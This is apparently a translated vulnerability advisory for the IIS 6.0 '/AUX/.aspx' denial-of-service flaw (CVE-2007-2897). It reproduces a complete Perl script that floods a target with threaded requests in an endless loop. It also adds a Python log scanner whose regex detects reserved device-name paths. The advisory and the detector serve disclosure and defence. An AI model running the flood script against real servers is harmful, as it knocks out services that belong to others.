Release date:
Updated on:
Affected Systems:
Microsoft IIS
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 51527
CVE ID: CVE-2007-2897
Internet Information Services (IIS) is a basic Internet service provided by Microsoft based on Microsoft Windows.
IIS 6.0 has a denial-of-service vulnerability when handling requests for specially crafted paths. Remote attackers can exploit this vulnerability to hang the service or leak sensitive information. Attackers who have physical access to the system can execute arbitrary code with the current user's privileges.
<* Source: 3APA3A (3APA3A@security.nnov.ru)
Link: http://seclists.org/fulldisclosure/2007/May/378
http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0419.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
3APA3A (3APA3A@security.nnov.ru) provides the following test methods:
# When sending multiple parallel GET requests to a IIS 6.0 server requesting
# /AUX/.aspx the server gets instable and non responsive. This happens only
# to servers which respond a runtime error (System.Web.HttpException)
# and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
# Signed,
# Kingdom () gmx net
##########################################################################
###***********************************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### By Kingdom, May/2007
### Better run this from a Linux system
##########################################################################
use IO::Socket;
use threads;

if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
$| = 1;

# Worker: one GET for /AUX/.aspx per thread.
sub sendit {
    $sock = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 'http(80)',
                                  Proto    => 'tcp');
    print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n";
}

# Probe once and check whether the server answers with the runtime error.
$sock = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => 'http(80)',
                              Proto    => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n";
$k = 0;
while (<$sock>) {
    if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
        $k = 1;
        last;
    }
}
if ($k == 0) {
    print "Server does not seem vulnerable to this attack.\n";
    exit;
}
print "ATTACK!\n";
while (1) {
    for (my $i = 0; $i <= 100; $i++) {
        $thr = threads->new(\&sendit);
        print "\r\r$i/100 ";
    }
    foreach $thr (threads->list) {
        $thr->join;
    }
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Microsoft
---------
The vendor has not yet provided a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://www.microsoft.com/technet/security/
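
Detection while no patch is available (an added example, not part of the original advisory or of any vendor guidance): the Python below scans IIS W3C extended log lines for the pattern described above, many requests from one client for a path such as /AUX/.aspx that take two or more seconds to answer. It goes beyond the advisory by also matching the other reserved DOS device names; those names, the one-minute bucket, the threshold of 20 and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The advisory names only AUX; the other reserved DOS device names are an
# assumption added here so the same check covers the whole class of paths.
RESERVED = re.compile(r"^(aux|con|nul|prn|com[1-9]|lpt[1-9])$", re.I)

def parse_w3c(lines):
    """Yield one dict per request from IIS W3C extended log lines."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def has_device_segment(uri_stem):
    """True if a path segment is a reserved device name, as in /AUX/.aspx."""
    segments = unquote(uri_stem).replace("\\", "/").split("/")
    return any(RESERVED.match(s.split(".")[0].strip()) for s in segments if s)

def flag_bursts(lines, threshold=20, slow_ms=2000):
    """Map (client, date, minute) -> (hits, slow_hits) for buckets that reach
    `threshold` device-path requests; slow means time-taken >= slow_ms."""
    hits, slow = Counter(), Counter()
    for rec in parse_w3c(lines):
        if not has_device_segment(rec.get("cs-uri-stem", "")):
            continue
        key = (rec.get("c-ip"), rec.get("date"), rec.get("time", "")[:5])
        hits[key] += 1
        taken = rec.get("time-taken", "")  # IIS logs this in milliseconds
        if taken.isdigit() and int(taken) >= slow_ms:
            slow[key] += 1
    return {k: (n, slow[k]) for k, n in hits.items() if n >= threshold}

# Constructed sample log (not real traffic): one client bursting, one benign.
SAMPLE = ["#Fields: date time c-ip cs-method cs-uri-stem time-taken"]
SAMPLE += [f"2007-05-22 10:15:{s:02d} 192.0.2.10 GET /AUX/.aspx 2300"
           for s in range(30)]
SAMPLE += ["2007-05-22 10:15:05 192.0.2.77 GET /auxiliary/index.aspx 15",
           "2007-05-22 10:16:01 192.0.2.77 GET /AUX/.aspx 2100"]

if __name__ == "__main__":
    for (ip, date, minute), (n, slow_n) in flag_bursts(SAMPLE).items():
        print(f"{date} {minute} {ip}: {n} device-path requests, {slow_n} slow")
```

The same path test can back a request-filtering rule at a reverse proxy or filter in front of the server, so that such paths never reach ASP.NET.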